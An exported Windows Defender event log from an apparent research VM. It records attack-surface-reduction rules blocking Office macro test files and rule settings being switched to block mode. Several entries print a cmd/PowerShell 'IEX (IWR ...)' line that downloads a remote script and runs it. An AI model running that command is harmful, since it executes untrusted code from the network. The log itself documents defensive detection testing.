EventCode=1121
EventType=3
LogName=Microsoft-Windows-Windows Defender/Operational
ComputerName=researchvmhaa
Type=Warning
RecordNumber=2975
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
ID: 3B576869-A4EC-4529-8536-B80A7769E899
Detection time: 2023-11-20T16:29:48.984Z
User: researchvmhaa\research
Path: C:\Users\research\AppData\Local\Temp\script.vbs
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline:
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.912.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
Unlabelled field (data tag lost in export): ENT\ConsR
EventCode=1121
EventType=3
LogName=Microsoft-Windows-Windows Defender/Operational
ComputerName=researchvmhaa
Type=Warning
RecordNumber=2972
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
ID: 3B576869-A4EC-4529-8536-B80A7769E899
Detection time: 2023-11-20T16:27:30.572Z
User: researchvmhaa\research
Path: C:\Users\research\AppData\Local\Temp\script.vbs
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline:
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.912.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
Unlabelled field (data tag lost in export): ENT\ConsR
EventCode=1121
EventType=3
LogName=Microsoft-Windows-Windows Defender/Operational
ComputerName=researchvmhaa
Type=Warning
RecordNumber=2971
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-20T16:27:18.000Z
User: researchvmhaa\research
Path: C:\Windows\System32\rundll32.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Target Commandline: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} -Embedding
Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac5.xls"
Involved File: C:\Users\research\Desktop\macs\mac5.xls
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.912.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
Unlabelled field (data tag lost in export): ENT\ConsR
EventCode=1121
EventType=3
LogName=Microsoft-Windows-Windows Defender/Operational
ComputerName=researchvmhaa
Type=Warning
RecordNumber=2964
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-20T15:42:46.183Z
User: researchvmhaa\research
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Target Commandline: cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')
Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac7.xls"
Involved File: C:\Users\research\Desktop\macs\mac7.xls
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.908.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
Unlabelled field (data tag lost in export): ENT\ConsR
EventCode=1121
EventType=3
LogName=Microsoft-Windows-Windows Defender/Operational
ComputerName=researchvmhaa
Type=Warning
RecordNumber=2963
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-20T15:42:37.633Z
User: researchvmhaa\research
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Target Commandline: cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')
Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac8.xls"
Involved File: C:\Users\research\Desktop\macs\mac8.xls
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.908.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
Unlabelled field (data tag lost in export): ENT\ConsR
EventCode=1121
EventType=3
LogName=Microsoft-Windows-Windows Defender/Operational
ComputerName=researchvmhaa
Type=Warning
RecordNumber=2961
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-20T15:42:14.127Z
User: researchvmhaa\research
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Target Commandline: cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')
Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac6.xls"
Involved File: C:\Users\research\Desktop\macs\mac6.xls
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.908.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
Unlabelled field (data tag lost in export): ENT\ConsR
EventCode=5007
EventType=4
LogName=Microsoft-Windows-Windows Defender/Operational
ComputerName=researchvmhaa
Type=Information
RecordNumber=2911
Product Version: 4.18.23100.2009
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value / New value (only one of the two survived the export, the other is empty): HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1
EventCode=5007
EventType=4
LogName=Microsoft-Windows-Windows Defender/Operational
ComputerName=researchvmhaa
Type=Information
RecordNumber=2908
Product Version: 4.18.23100.2009
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\SmartLockerMode = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\SmartLockerMode = 0x0
EventCode=5007
EventType=4
LogName=Microsoft-Windows-Windows Defender/Operational
ComputerName=researchvmhaa
Type=Information
RecordNumber=2907
Product Version: 4.18.23100.2009
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\VerifiedAndReputableTrustModeEnabled = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\VerifiedAndReputableTrustModeEnabled = 0x0
11/20/2023 03:31:50 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2779
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\SacLearningModeSwitch = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\SacLearningModeSwitch = 0x1
11/20/2023 03:31:45 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2772
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1
11/19/2023 03:39:33 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2740
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1
New value:
11/19/2023 01:31:53 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2597
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1
11/18/2023 12:31:48 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2496
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1
New value:
11/17/2023 05:29:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2398
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-17T17:29:44.894Z
User: researchvmhaa\research
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Target Commandline: cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')
Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac8.xls"
Involved File: C:\Users\research\Desktop\macs\mac8.xls
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2397
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2396
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2395
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2394
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2393
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2392
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2391
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2390
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2389
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2388
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2387
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2386
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2385
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2384
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2383
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2382
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x1
11/17/2023 05:27:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2379
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-17T17:27:28.753Z
User: researchvmhaa\research
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Target Commandline: cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')
Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac7.xls"
Involved File: C:\Users\research\Desktop\macs\mac7.xls
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 05:27:18 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2378
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-17T17:27:18.518Z
User: researchvmhaa\research
Path: C:\Windows\System32\rundll32.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Target Commandline: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} -Embedding
Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac5.xls"
Involved File: C:\Users\research\Desktop\macs\mac5.xls
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 05:27:11 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2377
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-17T17:27:11.636Z
User: researchvmhaa\research
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Target Commandline: cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')
Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac1.xls"
Involved File: C:\Users\research\Desktop\macs\mac1.xls
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 05:26:53 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2376
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-17T17:26:53.781Z
User: researchvmhaa\research
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Target Commandline: cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')
Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macrotestinglive.xls"
Involved File: C:\Users\research\Desktop\macrotestinglive.xls
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 05:23:37 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1129
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2360
Keywords=None
TaskCategory=None
OpCode=Info
Message=A user has allowed a blocked Microsoft Defender Exploit Guard operation.
ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C
User: NT AUTHORITY\SYSTEM
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Windows\PSEXESVC.exe
Involved File:
11/17/2023 05:23:35 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1129
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2359
Keywords=None
TaskCategory=None
OpCode=Info
Message=A user has allowed a blocked Microsoft Defender Exploit Guard operation.
ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C
User: NT AUTHORITY\SYSTEM
Path: C:\Windows\cmd.exe
Process Name: C:\Windows\PSEXESVC.exe
Involved File:
11/17/2023 05:23:27 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2358
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C
Detection time: 2023-11-17T17:23:27.874Z
User: NT AUTHORITY\SYSTEM
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Windows\PSEXESVC.exe
Target Commandline: "cmd"
Parent Commandline: C:\Windows\PSEXESVC.exe
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
